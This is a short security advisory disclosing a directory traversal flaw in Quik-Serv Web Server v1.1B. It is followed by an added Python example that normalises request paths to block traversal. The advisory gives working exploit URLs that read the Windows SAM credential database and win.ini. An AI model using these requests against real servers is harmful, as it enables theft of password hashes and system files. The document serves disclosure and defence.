Quik-Serv Web Server v1.1B Arbitrary File Disclosure

Abstract:
Quik-Serv Web Server is a small web server with built-in CGI support. The server is vulnerable to a directory traversal that allows a remote user to display arbitrary files.

Exploit:
To display the SAM database
http://server/../../../winnt/repair/sam

To display the win.ini file
http://server/../../../winnt/win.ini

Workaround:
Install packet filtering systems, wait for a fix, or don't even use the product.

Vendor Status:
The vendor has been contacted but has not replied.

--
p0p t4rtz
p0pt4rtz@hotmail.com
NetCra$h Security Research Team
http://www26.brinkster.com/netcrash/
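
The missing server-side check, as an added example that is not part of the original advisory and not Quik-Serv code: a request path is decoded, split on both separators, and refused if any ".." segment would climb above the document root. It goes beyond the two plain "../" requests above by also covering percent-encoded and backslash forms; DOCROOT and safe_resolve are hypothetical names.

```python
import re
from urllib.parse import unquote, urlsplit

DOCROOT = "C:/quikserv/htdocs"  # hypothetical document root, not from the advisory


def safe_resolve(request_target, docroot=DOCROOT):
    """Return the file path under docroot for a request, or None to refuse it."""
    path = urlsplit(request_target).path  # drops scheme, host and query string

    # Decode percent-escapes until the value is stable, so %2e%2e%2f or
    # double encoding (%252e) cannot hide dot segments from the check below.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        return None  # still changing after three passes: refuse

    if "\x00" in path or ":" in path:
        return None  # NUL truncation, drive letters, alternate data streams

    segments = []
    # Windows accepts "/" and "\" alike, so split on either one.
    for seg in re.split(r"[/\\]+", path):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                return None  # would climb above the document root
            segments.pop()
        else:
            segments.append(seg)

    return "/".join([docroot.rstrip("/")] + segments)


if __name__ == "__main__":
    # Constructed sample requests; the first two are the paths from the advisory.
    for target in ("/../../../winnt/repair/sam",
                   "/../../../winnt/win.ini",
                   "/..%5c..%5cwinnt%5cwin.ini",
                   "/docs/../index.html"):
        print(target, "->", safe_resolve(target))
```

The same decode-then-normalise logic can run in a filtering proxy in front of an unpatched server, which is the closest practical form of the packet-filtering workaround.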